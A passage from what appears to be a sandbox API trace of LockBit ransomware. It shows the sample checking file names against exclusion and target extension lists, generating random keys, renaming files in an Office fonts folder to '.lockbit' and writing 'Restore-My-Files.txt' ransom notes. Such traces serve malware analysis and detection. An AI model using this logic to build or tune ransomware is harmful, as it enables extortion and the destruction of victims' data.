lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.507] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.lockbit") returned 82 [0195.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.508] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.508] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.508] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3822) returned 1 [0195.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.509] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0195.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.542] malloc (_Size=0xba) returned 0x1fa2ed8 [0195.542] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0195.542] free (_Block=0x1fa2ed8) [0195.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.542] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09100, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe09100, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apothecary.xml", cAlternateFileName="APOTHE~1.XML")) returned 1 [0195.542] lstrcmpiW (lpString1=".", lpString2="Apothecary.xml") returned -1 [0195.542] lstrcmpiW (lpString1="..", lpString2="Apothecary.xml") returned -1 [0195.543] PathFindExtensionW (pszPath="Apothecary.xml") returned=".xml" [0195.543] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.543] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.544] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apothecary.xml") returned 1 [0195.544] lstrcmpiW (lpString1="ntldr", lpString2="Apothecary.xml") returned 1 [0195.544] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apothecary.xml") returned 1 [0195.545] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apothecary.xml") returned 1 [0195.545] lstrcmpiW (lpString1="autorun.inf", lpString2="Apothecary.xml") returned 1 [0195.545] lstrcmpiW (lpString1="thumbs.db", lpString2="Apothecary.xml") returned 1 [0195.545] lstrcmpiW (lpString1="iconcache.db", lpString2="Apothecary.xml") returned 1 [0195.545] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.545] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml") returned=".xml" [0195.545] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.545] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.545] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.546] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.546] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.lockbit") returned 88 [0195.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.548] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.548] malloc (_Size=0x40068) returned 0x3df0008 [0195.548] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3615) returned 1 [0195.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.549] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.551] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.551] malloc (_Size=0xc6) returned 0x1fa2ed8 [0195.551] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0195.553] free (_Block=0x1fa2ed8) [0195.553] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.553] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.553] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedcdc100, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x61830490, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedcdc100, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspect.xml", cAlternateFileName="")) returned 1 [0195.553] lstrcmpiW (lpString1=".", lpString2="Aspect.xml") returned -1 [0195.553] lstrcmpiW (lpString1="..", lpString2="Aspect.xml") returned -1 [0195.553] PathFindExtensionW (pszPath="Aspect.xml") returned=".xml" [0195.554] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.554] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.555] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="ntldr", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="bootsect.bak", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="autorun.inf", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="thumbs.db", lpString2="Aspect.xml") returned 1 [0195.556] lstrcmpiW (lpString1="iconcache.db", lpString2="Aspect.xml") returned 1 [0195.556] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.556] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml") returned=".xml" [0195.556] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.556] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.556] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.557] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.557] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.lockbit") returned 84 [0195.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.559] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.559] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.559] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3595) returned 1 [0195.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.560] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0195.566] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.566] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.566] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0195.567] free (_Block=0x1fa2ed8) [0195.568] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.568] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.568] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.568] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211be00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x211be00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Austin.xml", cAlternateFileName="")) returned 1 [0195.568] lstrcmpiW (lpString1=".", lpString2="Austin.xml") returned -1 [0195.568] lstrcmpiW (lpString1="..", lpString2="Austin.xml") returned -1 [0195.568] PathFindExtensionW (pszPath="Austin.xml") returned=".xml" [0195.568] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.568] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.569] 